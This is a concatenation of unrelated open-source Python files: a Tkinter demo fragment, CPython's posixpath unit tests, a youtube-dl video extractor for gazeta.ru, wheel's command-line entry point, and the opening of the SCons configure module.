pick = self.selectOpenFile(file='big_gui.py')
if pick:
self.browser(pick) # browse my source file, or other
def more(self):
new = Toplevel()
Label(new, text='A new non-modal window').pack()
Button(new, text='Quit', command=self.quit).pack(side=LEFT)
Button(new, text='More', command=self.more).pack(side=RIGHT)
def pickDemo(self):
pick = self.selectOpenFile(dir='..')
if pick:
self.spawn(pick) # spawn any Python program
if __name__ == '__main__': Hello().mainloop() # make one, run one
|
xxd3vin/spp-sdk
|
refs/heads/master
|
opt/Python27/Lib/test/test_posixpath.py
|
36
|
import unittest
from test import test_support, test_genericpath
import posixpath, os
from posixpath import realpath, abspath, dirname, basename
# An absolute path to a temporary filename for testing. We can't rely on TESTFN
# being an absolute path, so we need this.
ABSTFN = abspath(test_support.TESTFN)
def safe_rmdir(dirname):
try:
os.rmdir(dirname)
except OSError:
pass
class PosixPathTest(unittest.TestCase):
def setUp(self):
self.tearDown()
def tearDown(self):
for suffix in ["", "1", "2"]:
test_support.unlink(test_support.TESTFN + suffix)
safe_rmdir(test_support.TESTFN + suffix)
def test_join(self):
self.assertEqual(posixpath.join("/foo", "bar", "/bar", "baz"), "/bar/baz")
self.assertEqual(posixpath.join("/foo", "bar", "baz"), "/foo/bar/baz")
self.assertEqual(posixpath.join("/foo/", "bar/", "baz/"), "/foo/bar/baz/")
def test_split(self):
self.assertEqual(posixpath.split("/foo/bar"), ("/foo", "bar"))
self.assertEqual(posixpath.split("/"), ("/", ""))
self.assertEqual(posixpath.split("foo"), ("", "foo"))
self.assertEqual(posixpath.split("////foo"), ("////", "foo"))
self.assertEqual(posixpath.split("//foo//bar"), ("//foo", "bar"))
def splitextTest(self, path, filename, ext):
self.assertEqual(posixpath.splitext(path), (filename, ext))
self.assertEqual(posixpath.splitext("/" + path), ("/" + filename, ext))
self.assertEqual(posixpath.splitext("abc/" + path), ("abc/" + filename, ext))
self.assertEqual(posixpath.splitext("abc.def/" + path), ("abc.def/" + filename, ext))
self.assertEqual(posixpath.splitext("/abc.def/" + path), ("/abc.def/" + filename, ext))
self.assertEqual(posixpath.splitext(path + "/"), (filename + ext + "/", ""))
def test_splitext(self):
self.splitextTest("foo.bar", "foo", ".bar")
self.splitextTest("foo.boo.bar", "foo.boo", ".bar")
self.splitextTest("foo.boo.biff.bar", "foo.boo.biff", ".bar")
self.splitextTest(".csh.rc", ".csh", ".rc")
self.splitextTest("nodots", "nodots", "")
self.splitextTest(".cshrc", ".cshrc", "")
self.splitextTest("...manydots", "...manydots", "")
self.splitextTest("...manydots.ext", "...manydots", ".ext")
self.splitextTest(".", ".", "")
self.splitextTest("..", "..", "")
self.splitextTest("........", "........", "")
self.splitextTest("", "", "")
def test_isabs(self):
self.assertIs(posixpath.isabs(""), False)
self.assertIs(posixpath.isabs("/"), True)
self.assertIs(posixpath.isabs("/foo"), True)
self.assertIs(posixpath.isabs("/foo/bar"), True)
self.assertIs(posixpath.isabs("foo/bar"), False)
def test_basename(self):
self.assertEqual(posixpath.basename("/foo/bar"), "bar")
self.assertEqual(posixpath.basename("/"), "")
self.assertEqual(posixpath.basename("foo"), "foo")
self.assertEqual(posixpath.basename("////foo"), "foo")
self.assertEqual(posixpath.basename("//foo//bar"), "bar")
def test_dirname(self):
self.assertEqual(posixpath.dirname("/foo/bar"), "/foo")
self.assertEqual(posixpath.dirname("/"), "/")
self.assertEqual(posixpath.dirname("foo"), "")
self.assertEqual(posixpath.dirname("////foo"), "////")
self.assertEqual(posixpath.dirname("//foo//bar"), "//foo")
def test_islink(self):
self.assertIs(posixpath.islink(test_support.TESTFN + "1"), False)
f = open(test_support.TESTFN + "1", "wb")
try:
f.write("foo")
f.close()
self.assertIs(posixpath.islink(test_support.TESTFN + "1"), False)
if hasattr(os, "symlink"):
os.symlink(test_support.TESTFN + "1", test_support.TESTFN + "2")
self.assertIs(posixpath.islink(test_support.TESTFN + "2"), True)
os.remove(test_support.TESTFN + "1")
self.assertIs(posixpath.islink(test_support.TESTFN + "2"), True)
self.assertIs(posixpath.exists(test_support.TESTFN + "2"), False)
self.assertIs(posixpath.lexists(test_support.TESTFN + "2"), True)
finally:
if not f.close():
f.close()
def test_samefile(self):
f = open(test_support.TESTFN + "1", "wb")
try:
f.write("foo")
f.close()
self.assertIs(
posixpath.samefile(
test_support.TESTFN + "1",
test_support.TESTFN + "1"
),
True
)
# If we don't have links, assume that os.stat doesn't return resonable
# inode information and thus, that samefile() doesn't work
if hasattr(os, "symlink"):
os.symlink(
test_support.TESTFN + "1",
test_support.TESTFN + "2"
)
self.assertIs(
posixpath.samefile(
test_support.TESTFN + "1",
test_support.TESTFN + "2"
),
True
)
os.remove(test_support.TESTFN + "2")
f = open(test_support.TESTFN + "2", "wb")
f.write("bar")
f.close()
self.assertIs(
posixpath.samefile(
test_support.TESTFN + "1",
test_support.TESTFN + "2"
),
False
)
finally:
if not f.close():
f.close()
def test_samestat(self):
f = open(test_support.TESTFN + "1", "wb")
try:
f.write("foo")
f.close()
self.assertIs(
posixpath.samestat(
os.stat(test_support.TESTFN + "1"),
os.stat(test_support.TESTFN + "1")
),
True
)
# If we don't have links, assume that os.stat() doesn't return resonable
# inode information and thus, that samefile() doesn't work
if hasattr(os, "symlink"):
if hasattr(os, "symlink"):
os.symlink(test_support.TESTFN + "1", test_support.TESTFN + "2")
self.assertIs(
posixpath.samestat(
os.stat(test_support.TESTFN + "1"),
os.stat(test_support.TESTFN + "2")
),
True
)
os.remove(test_support.TESTFN + "2")
f = open(test_support.TESTFN + "2", "wb")
f.write("bar")
f.close()
self.assertIs(
posixpath.samestat(
os.stat(test_support.TESTFN + "1"),
os.stat(test_support.TESTFN + "2")
),
False
)
finally:
if not f.close():
f.close()
def test_ismount(self):
self.assertIs(posixpath.ismount("/"), True)
def test_expanduser(self):
self.assertEqual(posixpath.expanduser("foo"), "foo")
try:
import pwd
except ImportError:
pass
else:
self.assertIsInstance(posixpath.expanduser("~/"), basestring)
# if home directory == root directory, this test makes no sense
if posixpath.expanduser("~") != '/':
self.assertEqual(
posixpath.expanduser("~") + "/",
posixpath.expanduser("~/")
)
self.assertIsInstance(posixpath.expanduser("~root/"), basestring)
self.assertIsInstance(posixpath.expanduser("~foo/"), basestring)
with test_support.EnvironmentVarGuard() as env:
env['HOME'] = '/'
self.assertEqual(posixpath.expanduser("~"), "/")
def test_normpath(self):
self.assertEqual(posixpath.normpath(""), ".")
self.assertEqual(posixpath.normpath("/"), "/")
self.assertEqual(posixpath.normpath("//"), "//")
self.assertEqual(posixpath.normpath("///"), "/")
self.assertEqual(posixpath.normpath("///foo/.//bar//"), "/foo/bar")
self.assertEqual(posixpath.normpath("///foo/.//bar//.//..//.//baz"), "/foo/baz")
self.assertEqual(posixpath.normpath("///..//./foo/.//bar"), "/foo/bar")
if hasattr(os, "symlink"):
def test_realpath_basic(self):
# Basic operation.
try:
os.symlink(ABSTFN+"1", ABSTFN)
self.assertEqual(realpath(ABSTFN), ABSTFN+"1")
finally:
test_support.unlink(ABSTFN)
def test_realpath_symlink_loops(self):
# Bug #930024, return the path unchanged if we get into an infinite
# symlink loop.
try:
old_path = abspath('.')
os.symlink(ABSTFN, ABSTFN)
self.assertEqual(realpath(ABSTFN), ABSTFN)
os.symlink(ABSTFN+"1", ABSTFN+"2")
os.symlink(ABSTFN+"2", ABSTFN+"1")
self.assertEqual(realpath(ABSTFN+"1"), ABSTFN+"1")
self.assertEqual(realpath(ABSTFN+"2"), ABSTFN+"2")
# Test using relative path as well.
os.chdir(dirname(ABSTFN))
self.assertEqual(realpath(basename(ABSTFN)), ABSTFN)
finally:
os.chdir(old_path)
test_support.unlink(ABSTFN)
test_support.unlink(ABSTFN+"1")
test_support.unlink(ABSTFN+"2")
def test_realpath_resolve_parents(self):
# We also need to resolve any symlinks in the parents of a relative
# path passed to realpath. E.g.: current working directory is
# /usr/doc with 'doc' being a symlink to /usr/share/doc. We call
# realpath("a"). This should return /usr/share/doc/a/.
try:
old_path = abspath('.')
os.mkdir(ABSTFN)
os.mkdir(ABSTFN + "/y")
os.symlink(ABSTFN + "/y", ABSTFN + "/k")
os.chdir(ABSTFN + "/k")
self.assertEqual(realpath("a"), ABSTFN + "/y/a")
finally:
os.chdir(old_path)
test_support.unlink(ABSTFN + "/k")
safe_rmdir(ABSTFN + "/y")
safe_rmdir(ABSTFN)
def test_realpath_resolve_before_normalizing(self):
# Bug #990669: Symbolic links should be resolved before we
# normalize the path. E.g.: if we have directories 'a', 'k' and 'y'
# in the following hierarchy:
# a/k/y
#
# and a symbolic link 'link-y' pointing to 'y' in directory 'a',
# then realpath("link-y/..") should return 'k', not 'a'.
try:
old_path = abspath('.')
os.mkdir(ABSTFN)
os.mkdir(ABSTFN + "/k")
os.mkdir(ABSTFN + "/k/y")
os.symlink(ABSTFN + "/k/y", ABSTFN + "/link-y")
# Absolute path.
self.assertEqual(realpath(ABSTFN + "/link-y/.."), ABSTFN + "/k")
# Relative path.
os.chdir(dirname(ABSTFN))
self.assertEqual(realpath(basename(ABSTFN) + "/link-y/.."),
ABSTFN + "/k")
finally:
os.chdir(old_path)
test_support.unlink(ABSTFN + "/link-y")
safe_rmdir(ABSTFN + "/k/y")
safe_rmdir(ABSTFN + "/k")
safe_rmdir(ABSTFN)
def test_realpath_resolve_first(self):
# Bug #1213894: The first component of the path, if not absolute,
# must be resolved too.
try:
old_path = abspath('.')
os.mkdir(ABSTFN)
os.mkdir(ABSTFN + "/k")
os.symlink(ABSTFN, ABSTFN + "link")
os.chdir(dirname(ABSTFN))
base = basename(ABSTFN)
self.assertEqual(realpath(base + "link"), ABSTFN)
self.assertEqual(realpath(base + "link/k"), ABSTFN + "/k")
finally:
os.chdir(old_path)
test_support.unlink(ABSTFN + "link")
safe_rmdir(ABSTFN + "/k")
safe_rmdir(ABSTFN)
def test_relpath(self):
(real_getcwd, os.getcwd) = (os.getcwd, lambda: r"/home/user/bar")
try:
curdir = os.path.split(os.getcwd())[-1]
self.assertRaises(ValueError, posixpath.relpath, "")
self.assertEqual(posixpath.relpath("a"), "a")
self.assertEqual(posixpath.relpath(posixpath.abspath("a")), "a")
self.assertEqual(posixpath.relpath("a/b"), "a/b")
self.assertEqual(posixpath.relpath("../a/b"), "../a/b")
self.assertEqual(posixpath.relpath("a", "../b"), "../"+curdir+"/a")
self.assertEqual(posixpath.relpath("a/b", "../c"), "../"+curdir+"/a/b")
self.assertEqual(posixpath.relpath("a", "b/c"), "../../a")
self.assertEqual(posixpath.relpath("a", "a"), ".")
self.assertEqual(posixpath.relpath("/foo/bar/bat", "/x/y/z"), '../../../foo/bar/bat')
self.assertEqual(posixpath.relpath("/foo/bar/bat", "/foo/bar"), 'bat')
self.assertEqual(posixpath.relpath("/foo/bar/bat", "/"), 'foo/bar/bat')
self.assertEqual(posixpath.relpath("/", "/foo/bar/bat"), '../../..')
self.assertEqual(posixpath.relpath("/foo/bar/bat", "/x"), '../foo/bar/bat')
self.assertEqual(posixpath.relpath("/x", "/foo/bar/bat"), '../../../x')
self.assertEqual(posixpath.relpath("/", "/"), '.')
self.assertEqual(posixpath.relpath("/a", "/a"), '.')
self.assertEqual(posixpath.relpath("/a/b", "/a/b"), '.')
finally:
os.getcwd = real_getcwd
class PosixCommonTest(test_genericpath.CommonTest):
pathmodule = posixpath
attributes = ['relpath', 'samefile', 'sameopenfile', 'samestat']
def test_main():
test_support.run_unittest(PosixPathTest, PosixCommonTest)
if __name__=="__main__":
test_main()
|
fast90/youtube-dl
|
refs/heads/master
|
youtube_dl/extractor/gazeta.py
|
23
|
# coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
class GazetaIE(InfoExtractor):
_VALID_URL = r'(?P<url>https?://(?:www\.)?gazeta\.ru/(?:[^/]+/)?video/(?:main/)*(?:\d{4}/\d{2}/\d{2}/)?(?P<id>[A-Za-z0-9-_.]+)\.s?html)'
_TESTS = [{
'url': 'http://www.gazeta.ru/video/main/zadaite_vopros_vladislavu_yurevichu.shtml',
'md5': 'd49c9bdc6e5a7888f27475dc215ee789',
'info_dict': {
'id': '205566',
'ext': 'mp4',
'title': '«70–80 процентов гражданских в Донецке на грани голода»',
'description': 'md5:38617526050bd17b234728e7f9620a71',
'thumbnail': 're:^https?://.*\.jpg',
},
'skip': 'video not found',
}, {
'url': 'http://www.gazeta.ru/lifestyle/video/2015/03/08/master-klass_krasivoi_byt._delaem_vesennii_makiyazh.shtml',
'only_matching': True,
}, {
'url': 'http://www.gazeta.ru/video/main/main/2015/06/22/platit_ili_ne_platit_po_isku_yukosa.shtml',
'md5': '37f19f78355eb2f4256ee1688359f24c',
'info_dict': {
'id': '252048',
'ext': 'mp4',
'title': '"Если по иску ЮКОСа придется платить, это будет большой удар по бюджету"',
},
'add_ie': ['EaglePlatform'],
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
display_id = mobj.group('id')
embed_url = '%s?p=embed' % mobj.group('url')
embed_page = self._download_webpage(
embed_url, display_id, 'Downloading embed page')
video_id = self._search_regex(
r'<div[^>]*?class="eagleplayer"[^>]*?data-id="([^"]+)"', embed_page, 'video id')
return self.url_result(
'eagleplatform:gazeta.media.eagleplatform.com:%s' % video_id, 'EaglePlatform')
|
BaichuanWu/Blog_on_django
|
refs/heads/master
|
site-packages/wheel/__main__.py
|
565
|
"""
Wheel command line tool (enable python -m wheel syntax)
"""
import sys
def main(): # needed for console script
if __package__ == '':
# To be able to run 'python wheel-0.9.whl/wheel':
import os.path
path = os.path.dirname(os.path.dirname(__file__))
sys.path[0:0] = [path]
import wheel.tool
sys.exit(wheel.tool.main())
if __name__ == "__main__":
sys.exit(main())
|
NullNoname/dolphin
|
refs/heads/master
|
Externals/scons-local/scons-local-2.0.1/SCons/SConf.py
|
61
|
"""SCons.SConf
Autoconf-like configuration support.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/SConf.py 5134 2010/08/16 23:02:40 bdeegan"
import SCons.compat
import io
import os
import re
import sys
import traceback
import SCons.Action
import SCons.Builder
import SCons.Errors
import SCons.Job
import SCons.Node.FS
import SCons.Taskmaster
import SCons.Util
import SCons.Warnings
import SCons.Conftest
from SCons.Debug import Trace
# Turn off the Conftest error logging
SCons.Conftest.LogInputFiles = 0
SCons.Conftest.LogErrorMessages = 0
# Set
build_type = None
build_types = ['clean', 'help']
def SetBuildType(type):
global build_type
build_type = type
# to be set, if we are in dry-run mode
dryrun = 0
AUTO=0 # use SCons dependency scanning for up-to-date checks
FORCE=1 # force all tests to be rebuilt
CACHE=2 # force all tests to be taken from cache (raise an error, if necessary)
cache_mode = AUTO
def SetCacheMode(mode):
"""Set the Configure cache mode. mode must be one of "auto", "force",
or "cache"."""
global cache_mode
if mode == "auto":
cache_mode = AUTO
elif mode == "force":
cache_mode = FORCE
elif mode == "cache":
cache_mode = CACHE
else:
raise ValueError("SCons.SConf.SetCacheMode: Unknown mode " + mode)
progress_display = SCons.Util.display # will be overwritten by SCons.Script
def SetProgressDisplay(display):
"""Set the progress display to use (called from SCons.Script)"""
global progress_display
progress_display = display
SConfFS = None
_ac_build_counter = 0 # incremented, whenever TryBuild is called
_ac_config_logs = {} # all config.log files created in this build
_ac_config_hs = {} # all config.h files created in this build
sconf_global = None # current sconf object
def _createConfigH(target, source, env):
t = open(str(target[0]), "w")
defname = re.sub('[^A-Za-z0-9_]', '_', str(target[0]).upper())
t.write("""#ifndef %(DEFNAME)s_SEEN
#define %(DEFNAME)s_SEEN
""" % {'DEFNAME' : defname})
t.write(source[0].get_contents())
t.write("""
#endif /* %(DEFNAME)s_SEEN */
""" % {'DEFNAME' : defname})
t.close()
def _stringConfigH(target, source, env):
return "scons: Configure: creating " + str(target[0])
def CreateConfigHBuilder(env):
"""Called just before the building targets phase begins."""
if len(_ac_config_hs) == 0:
return
action = SCons.Action.Action(_createConfigH,
_stringConfigH)
sconfigHBld = SCons.Builder.Builder(action=action)
env.Append( BUILDERS={'SConfigHBuilder':sconfigHBld} )
for k in _ac_config_hs.keys():
env.SConfigHBuilder(k, env.Value(_ac_config_hs[k]))
class SConfWarning(SCons.Warnings.Warning):
pass
SCons.Warnings.enableWarningClass(SConfWarning)
# some error definitions
class SConfError(SCons.Errors.UserError):
def __init__(self,msg):
SCons.Errors.UserError.__init__(self,msg)
class ConfigureDryRunError(SConfError):
"""Raised when a file or directory needs to be updated during a Configure
process, but the user requested a dry-run"""
def __init__(self,target):
if not isinstance(target, SCons.Node.FS.File):
msg = 'Cannot create configure directory "%s" within a dry-run.' % str(target)
else:
msg = 'Cannot update configure test "%s" within a dry-run.' % str(target)
SConfError.__init__(self,msg)
class ConfigureCacheError(SConfError):
"""Raised when a use explicitely requested the cache feature, but the test
is run the first time."""
def __init__(self,target):
SConfError.__init__(self, '"%s" is not yet built and cache is forced.' % str(target))
# define actions for building text files
def _createSource( target, source, env ):
fd = open(str(target[0]), "w")
fd.write(source[0].get_contents())
fd.close()
def _stringSource( target, source, env ):
return (str(target[0]) + ' <-\n |' +
source[0].get_contents().replace( '\n', "\n |" ) )
class SConfBuildInfo(SCons.Node.FS.FileBuildInfo):
"""
Special build info for targets of configure tests. Additional members
are result (did the builder succeed last time?) and string, which
contains messages of the original build phase.
"""
result = None # -> 0/None -> no error, != 0 error
string = None # the stdout / stderr output when building the target
def set_build_result(self, result, string):
self.result = result
self.string = string
class Streamer(object):
"""
'Sniffer' for a file-like writable object. Similar to the unix tool tee.
"""
def __init__(self, orig):
self.orig = orig
self.s = io.StringIO()
def write(self, str):
if self.orig:
self.orig.write(str)
self.s.write(str)
def writelines(self, lines):
for l in lines:
self.write(l + '\n')
def getvalue(self):
"""
Return everything written to orig since the Streamer was created.
"""
return self.s.getvalue()
def flush(self):
if self.orig:
self.orig.flush()
self.s.flush()
class SConfBuildTask(SCons.Taskmaster.AlwaysTask):
"""
This is almost the same as SCons.Script.BuildTask. Handles SConfErrors
correctly and knows about the current cache_mode.
"""
def display(self, message):
if sconf_global.logstream:
sconf_global.logstream.write("scons: Configure: " + message + "\n")
def display_cached_string(self, bi):
"""
Logs the original builder messages, given the SConfBuildInfo instance
bi.
"""
if not isinstance(bi, SConfBuildInfo):
SCons.Warnings.warn(SConfWarning,
"The stored build information has an unexpected class: %s" % bi.__class__)
else:
self.display("The original builder output was:\n" +
(" |" + str(bi.string)).replace("\n", "\n |"))
def failed(self):
# check, if the reason was a ConfigureDryRunError or a
# ConfigureCacheError and if yes, reraise the exception
exc_type = self.exc_info()[0]
if issubclass(exc_type, SConfError):
raise
elif issubclass(exc_type, SCons.Errors.BuildError):
# we ignore Build Errors (occurs, when a test doesn't pass)
# Clear the exception to prevent the contained traceback
# to build a reference cycle.
self.exc_clear()
else:
self.display('Caught exception while building "%s":\n' %
self.targets[0])
try:
excepthook = sys.excepthook
except AttributeError:
# Earlier versions of Python don't have sys.excepthook...
def excepthook(type, value, tb):
traceback.print_tb(tb)
print type, value
excepthook(*self.exc_info())
return SCons.Taskmaster.Task.failed(self)
def collect_node_states(self):
# returns (is_up_to_date, cached_error, cachable)
# where is_up_to_date is 1, if the node(s) are up_to_date
# cached_error is 1, if the node(s) are up_to_date, but the
# build will fail
# cachable is 0, if some nodes are not in our cache
T = 0
changed = False
cached_error = False
cachable = True
for t in self.targets:
if T: Trace('%s' % (t))
bi = t.get_stored_info().binfo
if isinstance(bi, SConfBuildInfo):
if T: Trace(': SConfBuildInfo')
if cache_mode == CACHE:
t.set_state(SCons.Node.up_to_date)
if T: Trace(': set_state(up_to-date)')
else:
if T: Trace(': get_state() %s' % t.get_state())
if T: Trace(': changed() %s' % t.changed())
if (t.get_state() != SCons.Node.up_to_date and t.changed()):
changed = True
if T: Trace(': changed %s' % changed)
cached_error = cached_error or bi.result
else:
if T: Trace(': else')
# the node hasn't been built in a SConf context or doesn't
# exist
cachable = False
changed = ( t.get_state() != SCons.Node.up_to_date )
if T: Trace(': changed %s' % changed)
if T: Trace('\n')
return (not changed, cached_error, cachable)
def execute(self):
if not self.targets[0].has_builder():
return
sconf = sconf_global
is_up_to_date, cached_error, cachable = self.collect_node_states()
if cache_mode == CACHE and not cachable:
raise ConfigureCacheError(self.targets[0])
elif cache_mode == FORCE:
is_up_to_date = 0
if cached_error and is_up_to_date:
self.display("Building \"%s\" failed in a previous run and all "
"its sources are up to date." % str(self.targets[0]))
binfo = self.targets[0].get_stored_info().binfo
self.display_cached_string(binfo)
raise SCons.Errors.BuildError # will be 'caught' in self.failed
elif is_up_to_date:
self.display("\"%s\" is up to date." % str(self.targets[0]))
binfo = self.targets[0].get_stored_info().binfo
self.display_cached_string(binfo)
elif dryrun:
raise ConfigureDryRunError(self.targets[0])
else:
# note stdout and stderr are the same here
s = sys.stdout = sys.stderr = Streamer(sys.stdout)
try:
env = self.targets[0].get_build_env()
if cache_mode == FORCE:
# Set up the Decider() to force rebuilds by saying
# that every source has changed. Note that we still
# call the environment's underlying source decider so
# that the correct .sconsign info will get calculated
# and keep the build state consistent.
def force_build(dependency, target, prev_ni,
env_decider=env.decide_source):
env_decider(dependency, target, prev_ni)
return True
if env.decide_source.func_code is not force_build.func_code:
env.Decider(force_build)
env['PSTDOUT'] = env['PSTDERR'] = s
try:
sconf.cached = 0
self.targets[0].build()
finally:
sys.stdout = sys.stderr = env['PSTDOUT'] = \
env['PSTDERR'] = sconf.logstream
except KeyboardInterrupt:
raise
except SystemExit:
exc_value = sys.exc_info()[1]
raise SCons.Errors.ExplicitExit(self.targets[0],exc_value.code)
except Exception, e:
for t in self.targets:
binfo = t.get_binfo()
binfo.__class__ = SConfBuildInfo
binfo.set_build_result(1, s.getvalue())
sconsign_entry = SCons.SConsign.SConsignEntry()
sconsign_entry.binfo = binfo
#sconsign_entry.ninfo = self.get_ninfo()
# We'd like to do this as follows:
# t.store_info(binfo)
# However, we need to store it as an SConfBuildInfo
# object, and store_info() will turn it into a
# regular FileNodeInfo if the target is itself a
# regular File.
sconsign = t.dir.sconsign()
sconsign.set_entry(t.name, sconsign_entry)
sconsign.merge()
raise e
else:
for t in self.targets:
binfo = t.get_binfo()
binfo.__class__ = SConfBuildInfo
binfo.set_build_result(0, s.getvalue())
sconsign_entry = SCons.SConsign.SConsignEntry()
sconsign_entry.binfo = binfo
#sconsign_entry.ninfo = self.get_ninfo()
# We'd like to do this as follows:
# t.store_info(binfo)
# However, we need to store it as an SConfBuildInfo
# object, and store_info() will turn it into a
# regular FileNodeInfo if the target is itself a
# regular File.
sconsign = t.dir.sconsign()
sconsign.set_entry(t.name, sconsign_entry)
sconsign.merge()
class SConfBase(object):
"""This is simply a class to represent a configure context. After
creating a SConf object, you can call any tests. After finished with your
tests, be sure to call the Finish() method, which returns the modified
environment.
Some words about caching: In most cases, it is not necessary to cache
Test results explicitely. Instead, we use the scons dependency checking
mechanism. For example, if one wants to compile a test program
(SConf.TryLink), the compiler is only called, if the program dependencies
have changed. However, if the program could not be compiled in a former
SConf run, we need to explicitely cache this error.
"""
def __init__(self, env, custom_tests = {}, conf_dir='$CONFIGUREDIR',
log_file='$CONFIGURELOG', config_h = None, _depth = 0):
"""Constructor. Pass additional tests in the custom_tests-dictinary,
e.g. custom_tests={'CheckPrivate':MyPrivateTest}, where MyPrivateTest
defines a custom test.
Note also the conf_dir and log_file arguments (you may want to
build tests in the VariantDir, not in the SourceDir)
"""
global SConfFS
if not SConfFS:
SConfFS = SCons.Node.FS.default_fs or \
SCons.Node.FS.FS(env.fs.pathTop)
if sconf_global is not None:
raise SCons.Errors.UserError
self.env = env
if log_file is not None:
log_file = SConfFS.File(env.subst(log_file))
self.logfile = log_file
self.logstream = None
self.lastTarget = None
self.depth = _depth
self.cached = 0 # will be set, if all test results are cached
# add default tests
default_tests = {
'CheckCC' : CheckCC,
'CheckCXX' : CheckCXX,
'CheckSHCC' : CheckSHCC,
'CheckSHCXX' : CheckSHCXX,
'CheckFunc' : CheckFunc,
'CheckType' : CheckType,
'CheckTypeSize' : CheckTypeSize,
'CheckDeclaration' : CheckDeclaration,
'CheckHeader' : CheckHeader,
'CheckCHeader' : CheckCHeader,
'CheckCXXHeader' : CheckCXXHeader,
'CheckLib' : CheckLib,
'CheckLibWithHeader' : CheckLibWithHeader,
}
self.AddTests(default_tests)
self.AddTests(custom_tests)
self.confdir = SConfFS.Dir(env.subst(conf_dir))
if config_h is not None:
config_h = SConfFS.File(config_h)
self.config_h = config_h
self._startup()
def Finish(self):
"""Call this method after finished with your tests:
env = sconf.Finish()
"""
self._shutdown()
return self.env
def Define(self, name, value = None, comment = None):
"""
Define a pre processor symbol name, with the optional given value in the
current config header.
If value is None (default), then #define name is written. If value is not
none, then #define name value is written.
comment is a string which will be put as a C comment in the
header, to explain the meaning of the value (appropriate C comments /* and
*/ will be put automatically."""
lines = []
if comment:
comment_str = "/* %s */" % comment
lines.append(comment_str)
if value is not None:
define_str = "#define %s %s" % (name, value)
else:
define_str = "#define %s" % name
lines.append(define_str)
lines.append('')
self.config_h_text = self.config_h_text + '\n'.join(lines)
def BuildNodes(self, nodes):
"""
Tries to build the given nodes immediately. Returns 1 on success,
0 on error.
"""
if self.logstream is not None:
# override stdout / stderr to write in log file
oldStdout = sys.stdout
sys.stdout = self.logstream
oldStderr = sys.stderr
sys.stderr = self.logstream
# the engine assumes the current path is the SConstruct directory ...
old_fs_dir = SConfFS.getcwd()
old_os_dir = os.getcwd()
SConfFS.chdir(SConfFS.Top, change_os_dir=1)
# Because we take responsibility here for writing out our
# own .sconsign info (see SConfBuildTask.execute(), above),
# we override the store_info() method with a null place-holder
# so we really control how it gets written.
for n in nodes:
n.store_info = n.do_not_store_info
ret = 1
try:
# ToDo: use user options for calc
save_max_drift = SConfFS.get_max_drift()
SConfFS.set_max_drift(0)
tm = SCons.Taskmaster.Taskmaster(nodes, SConfBuildTask)
# we don't want to build tests in parallel
jobs = SCons.Job.Jobs(1, tm )
jobs.run()
for n in nodes:
state = n.get_state()
if (state != SCons.Node.executed and
state != SCons.Node.up_to_date):
# the node could not be built. we return 0 in this case
ret = 0
finally:
SConfFS.set_max_drift(save_max_drift)
os.chdir(old_os_dir)
SConfFS.chdir(old_fs_dir, change_os_dir=0)
if self.logstream is not None:
# restore stdout / stderr
sys.stdout = oldStdout
sys.stderr = oldStderr
return ret
def pspawn_wrapper(self, sh, escape, cmd, args, env):
"""Wrapper function for handling piped spawns.
This looks to the calling interface (in Action.py) like a "normal"
spawn, but associates the call with the PSPAWN variable from
the construction environment and with the streams to which we
want the output logged. This gets slid into the construction
environment as the SPAWN variable so Action.py doesn't have to
know or care whether it's spawning a piped command or not.
"""
return self.pspawn(sh, escape, cmd, args, env, self.logstream, self.logstream)
def TryBuild(self, builder, text = None, extension = ""):
"""Low level TryBuild implementation. Normally you don't need to
call that - you can use TryCompile / TryLink / TryRun instead
"""
global _ac_build_counter
# Make sure we have a PSPAWN value, and save the current
# SPAWN value.
try:
self.pspawn = self.env['PSPAWN']
except KeyError:
raise SCons.Errors.UserError('Missing PSPAWN construction variable.')
try:
save_spawn = self.env['SPAWN']
except KeyError:
raise SCons.Errors.UserError('Missing SPAWN construction variable.')
nodesToBeBuilt = []
f = "conftest_" + str(_ac_build_counter)
pref = self.env.subst( builder.builder.prefix )
suff = self.env.subst( builder.builder.suffix )
target = self.confdir.File(pref + f + suff)
try:
# Slide our wrapper into the construction environment as
# the SPAWN function.
self.env['SPAWN'] = self.pspawn_wrapper
sourcetext = self.env.Value(text)
if text is not None:
textFile = self.confdir.File(f + extension)
textFileNode = self.env.SConfSourceBuilder(target=textFile,
source=sourcetext)
nodesToBeBuilt.extend(textFileNode)
source = textFileNode
else:
source = None
nodes = builder(target = target, source = source)
if not SCons.Util.is_List(nodes):
nodes = [nodes]
nodesToBeBuilt.extend(nodes)
result = self.BuildNodes(nodesToBeBuilt)
finally:
self.env['SPAWN'] = save_spawn
_ac_build_counter = _ac_build_counter + 1
if result:
self.lastTarget = nodes[0]
else:
self.lastTarget = None
return result
def TryAction(self, action, text = None, extension = ""):
"""Tries to execute the given action with optional source file
contents <text> and optional source file extension <extension>,
Returns the status (0 : failed, 1 : ok) and the contents of the
output file.
"""
builder = SCons.Builder.Builder(action=action)
self.env.Append( BUILDERS = {'SConfActionBuilder' : builder} )
ok = self.TryBuild(self.env.SConfActionBuilder, text, extension)
del self.env['BUILDERS']['SConfActionBuilder']
if ok:
outputStr = self.lastTarget.get_contents()
return (1, outputStr)
return (0, "")
def TryCompile( self, text, extension):
"""Compiles the program given in text to an env.Object, using extension
as file extension (e.g. '.c'). Returns 1, if compilation was
successful, 0 otherwise. The target is saved in self.lastTarget (for
further processing).
"""
return self.TryBuild(self.env.Object, text, extension)
